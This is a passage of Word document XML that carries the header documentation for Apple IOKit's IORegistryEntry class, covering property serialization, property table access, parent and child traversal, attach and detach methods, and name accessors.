        <w:t>es to the property table. Many non-kernel clients of IOKit read information from the registry via properties, and will invoke this method in a registry entry to create a serialization of all the entry's properties, which is then reconstructed in the client's task as a CFDictionary. This method may be intercepted by subclasses to update their properties or implement a different serialization method, though it is usually better to implement such functionality by creating objects in the property table and implementing their serialize methods, avoiding any need to implement serializeProperties.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param serialize The OSSerialize instance representing the serialization request.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result True on success, false otherwis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serializePropertie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Serializ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serializ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Unsynchronized(!) property table access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ropertyTable</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Unsynchronized accessor to a registry entry's property table.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method will return a pointer to the live property table as an OSDictionery. Its use is not recommended in most cases, instead use the synchronized accessors and helper functions of IORegistryEntry to access properties. It can only safely be used by one thread, which usually means it can only be used before a registry entry is entered into the registry.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result A pointer to the property table as an OSDictionary. The pointer is valid while the registry entry is retained, and should not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inline */</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OSDictiona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ropertyTabl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 return(fPropertyTable); }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Set properties from user level, to be overridden if support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Properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Optionally supported external method to set properties in a registry entry.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method is not implemented by IORegistryEntry, but is available to kernel and non-kernel clients to set properties in a registry entry. IOUserClient provides connection based, more controlled access to this functionality and may be more appropriate for many uses, since there is no differentiation between clients available to this method.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param properties Any OSObject subclass, to be interpreted by the implementing method - for example an OSDictionary, OSData etc. may all be appropriate.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result An IOReturn code to be returned to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turn</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>setPropertie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roperties</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Topology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arentIterator</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abstract Returns an iterator over an registry entry's parent entries in a specified plane.</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an iterator over the parents of the registry entry, or zero if there is a resource failure. The iterator must be released when the iteration is finished. All objects returned by the iteration are retained while the iterator is valid, though they may no longer be attached during the iteration.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Iterato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arentIterator</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applyToParent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ApplierFunction</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>applier</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ntex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arentEntry</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Returns an registry entry's first parent entry in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This function will return the parent to which a registry entry was first attached. Since the majority of registry entrys have only one provider, this is a useful simplification.</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the first parent of the registry entry, or zero if the entry is not attached into the registry in that plane. The parent is retained while the entry is attached, and should not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arent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ChildIterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Returns an iterator over an registry entry's child entries in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method creates an iterator which will return each of a registry entry's child entries in a specified plane.</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an iterator over the children of the entry, or zero if there is a resource failure. The iterator must be released when the iteration is finished. All objects returned by the iteration are retained while the iterator is valid, though they may no longer be attached during the iteration.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OSIterato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ChildIterator</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applyToChildre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ApplierFunction</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>applier</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ntex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ChildEntry</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abstract Returns an registry entry's first child entry in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This function will return the child which first attached to a registry entry.</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Returns the first child of the registry entry, or zero if the entry is not attached into the registry in that plane. The child is retained while the entry is attached, and should not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ChildEntry</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isChild</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Determines whether a registry entry is the child of another in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method called in the parent entry determines if the specified entry is a child, in a plane. Additionally, it can check if the child is the only child of the parent entry.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param child The possible child registry entry.</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param onlyChild If true, check also if the child is the only child.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result If the child argument is not a child of the registry entry, false is returned. If onlyChild is true and the child is not the only child of the entry, false is returned, otherwise true is return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isChild</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hild</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onlyChil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fals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isParent</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Determines whether a registry entry is the parent of another in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method called in the child entry determines if the specified entry is a parent, in a plane. Additionally, it can check if the parent is the only parent of the child entry.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param parent The possible parent registry entry.</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param onlyParent If true, check also if the parent is the only parent.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result If the parent argument is not a parent of the registry entry, false is returned. If onlyParent is true and the parent is not the only parent of the entry, false is returned, otherwise true is return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isPare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ren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onlyPare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fals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inPlane</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Determines whether a registry entry is attached in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method determines if the entry is attached in a plane to any other entr</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>y.  It can also be used to determine if the entry is a member of any plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane object, 0 indicates any plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result If the entry has a parent in the given plane or if plane = 0 then if entry has any parent; return true, otherwise fals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inPlan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Depth</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Counts the maximum number of entries between an entry and the registry root, in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method counts the number of entries between and entry and the registry root, in a plane, for each parent of the entry and returns the maximum value.</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The maximum number of entries between the entry and the root. Zero is returned if the entry is not attached in the plan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sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>getDep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Attach / detach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attachToParent</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Attaches a entry to a parent entry in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This is the usual method of entering an entry into the registry. It is a no-op and success if the entry is already attached to the parent. Attaching the  entry into the registry retains both the child and parent while they are attached. This method will call attachToChild in the parent entry if it is not being called from attachToChild.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param parent The registry entry to attach to.</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true on success, or false on a resource failure, or if the parent is the same as the chil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attachToPare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ren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etachFromParent</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Detaches an entry from a parent entry in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This is the usual method of removing an entry from the registry. It is a no-op if the entry is not attached to the parent. Detaching the entry will release both the child and parent. This method will call detachFromChild in the parent entry if it is not being called from detachFromChild.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param parent The registry entry to detach from.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane objec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detachFromPare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ren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attachToChild</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Method called in the parent entry when a child attaches.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method is called in the parent entry when a child attaches, to make overrides possible. This method will also call attachToParent in the child entry if it is not being called from attachToParent. It is a no-op and success if the entry is already a child. Attaching the  entry into the registry retains both the child and parent while they are attached.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param child The registry entry being attached.</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true on success, or false on a resource failure, or if the parent is the same as the chil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attachToChild</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hild</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etachFromChild</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Detaches a child entry from its parent in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method is called in the parent entry when a child detaches, to make overrides possible. It is a no-op if the entry is not a child of the parent. Detaching the entry will release both the child and parent. This method will call detachFromParent in the child entry if it is not being called from detachFromParent.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param parent The registry entry to detach.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane objec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detachFromChild</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hild</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etachAbove</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Detaches an entry from all its parent entries in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method calls detachFromParent in the entry for each of its parent entries in the plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane objec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detachAbov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etachAll</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Detaches an entry and all its children recursively in a plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method breaks the registry connections for a subtree. detachAbove is called in the entry, and all child entries and their children in the plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane objec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detachAll</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br/>
        <w:t>    </w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/* Name, location and path accessors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Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Returns the name assigned to the registry entry as a C-string.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion Entries can be named in a particular plane, or globally. If the entry is named in plane and the plane is specified that name will be returned, otherwise the global name is returned. The global name defaults to the entry's meta class name if it has not been named.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane object, or zero for the global name.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result A C-string name, valid while the entry is retained.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Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Returns the name assigned to the registry entry as an OSSymbol.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion Entries can be named in a particular plane, or globally. If the entry is named in plane and the plane is specified that name will be returned, otherwise the global name is returned. The global name defaults to the entry's meta class name if it has not been named.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane object, or zero for the global name.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
